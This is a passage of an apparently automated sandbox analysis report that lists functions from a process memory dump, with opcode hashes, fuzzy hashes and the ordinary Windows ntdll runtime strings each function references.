                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 8c609c8606231fdb808440f5c62cfa76812b0ff012c1b0a156c24708f1aec849
                                                            • Instruction ID: 57581c0b984455e3b1c2f6e9ee8a00ef023c4800f995a9ff3a8da53703dba1a0
                                                            • Opcode Fuzzy Hash: 8c609c8606231fdb808440f5c62cfa76812b0ff012c1b0a156c24708f1aec849
                                                            • Instruction Fuzzy Hash: EE5128316402597AFF51ABA4EC99FEAB3B9EF08305F0500A9E605A72C0DB70DE45CF54
                                                            Function 02E0B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: aadc5c257fbc5c76c8b95c0ae02b8c1e271d7937346da4001d5545d9fa219bec
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: 5E81A270E852498ADF288EA8C4D07EE7BA6BF4531CF18E65DD851A72D0C73098C2CB64
                                                            Function 02E720E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: 17aaa595c216caeb664ce7c7fd16dd26ef6df4c5f16a64ba164608bf94f423bd
                                                            • Instruction ID: eb74838a8d3b6f3f1a74053c0de8766f1ac0f8a9fac05261f03487a8ec8bbbdd
                                                            • Opcode Fuzzy Hash: 17aaa595c216caeb664ce7c7fd16dd26ef6df4c5f16a64ba164608bf94f423bd
                                                            • Instruction Fuzzy Hash: 00218E76A40159ABDB10DE79D840AEEBBF9EF44748F449126EE45E3240EB309A018BA0
                                                            Function 02DEF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02E302E7
                                                            • RTL: Re-Waiting, xrefs: 02E3031E
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02E302BD
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: 8e9e3db8b4d3de7b429b51f864e438d8ea9d340aad2c22bae6e3529dff58297f
                                                            • Instruction ID: 60021fdf712505326a2cd40446fb179ac980979b0fe17fa11d9be2d72b99dd92
                                                            • Opcode Fuzzy Hash: 8e9e3db8b4d3de7b429b51f864e438d8ea9d340aad2c22bae6e3529dff58297f
                                                            • Instruction Fuzzy Hash: 7EE1FE706487419FDB26EF28C884B2AB7E1BF84318F144A2DF4A68B7D1D774D844CB52
                                                            Function 02DFBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 02E37B8E
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02E37B7F
                                                            • RTL: Re-Waiting, xrefs: 02E37BAC
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 2e37ee92ebf6f67e0a7bb77c6fcda0b0ccce890f3631d1e11be11297b3a818a5
                                                            • Instruction ID: 73fea1972fb8d05d6b420ff3c16f3521e9487c1121c58d95a9d3cc2eb055d504
                                                            • Opcode Fuzzy Hash: 2e37ee92ebf6f67e0a7bb77c6fcda0b0ccce890f3631d1e11be11297b3a818a5
                                                            • Instruction Fuzzy Hash: D941E1317447029FD721CE25C850B6AB7E6EF88719F014A1EFA9A9B780DB31E805CF95
                                                            Function 02DFB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02E3728C
                                                            Strings
                                                            • RTL: Resource at %p, xrefs: 02E372A3
                                                            • RTL: Re-Waiting, xrefs: 02E372C1
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02E37294
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 885266447-605551621
                                                            • Opcode ID: a6576d3bbee645fb6546a50c8bed8fedd32eaf4d9fa5274ff6836458a365000d
                                                            • Instruction ID: 631898d2385c024ba973e27ef7a8e0324550a5a4dff648f56c31b2d9b78feece
                                                            • Opcode Fuzzy Hash: a6576d3bbee645fb6546a50c8bed8fedd32eaf4d9fa5274ff6836458a365000d
                                                            • Instruction Fuzzy Hash: CD410FB1780202ABD721CE25CC41F66B7A5FF88719F109619FE99AB340DB21E846CBD4
                                                            Function 02E72300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$]:%u
                                                            • API String ID: 48624451-3050659472
                                                            • Opcode ID: 88915021bdd239b0aea4dd96509e4970a9aa7b399f9d42f50080e2ef6b9d537f
                                                            • Instruction ID: 61123009013dd96f57d7ba24c730d6337922e68339b083563721bb7bf8cf01b3
                                                            • Opcode Fuzzy Hash: 88915021bdd239b0aea4dd96509e4970a9aa7b399f9d42f50080e2ef6b9d537f
                                                            • Instruction Fuzzy Hash: 99319872A4021AAFDB20DF29DC40BEE77F9EF44714F849555ED49E3240EB30AA459FA0
                                                            Function 02E07D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-
                                                            • API String ID: 1302938615-2137968064
                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction ID: a066c503b539621cc556e1309aeededfe4aec14b09c98543016f13f4f523adfc
                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                            • Instruction Fuzzy Hash: 8D918670E802159ADB24DE69C8C0BBEF7A5EF45768F14E61AE855A72C0D730A9C3CB50
                                                            Function 02DC9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.3141131277.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                            • Associated: 00000007.00000002.3141131277.0000000002EB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002EBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000007.00000002.3141131277.0000000002F2E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_2d90000_fc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$@
                                                            • API String ID: 0-1194432280
                                                            • Opcode ID: 070abf8248f7fa6caf26cce6562d47b85e1ea4d76c6c887e6d8a05bf809e4f80
                                                            • Instruction ID: 4986269fcbab6fa4e7fc60d773ebd0939302fcbc9f0d1f84527c974266461b4e
                                                            • Opcode Fuzzy Hash: 070abf8248f7fa6caf26cce6562d47b85e1ea4d76c6c887e6d8a05bf809e4f80
                                                            • Instruction Fuzzy Hash: 30812E72D402699BDB31DB54CC55BEEB7B8AB08714F1081DAAA1AB7240D7705E84CFA0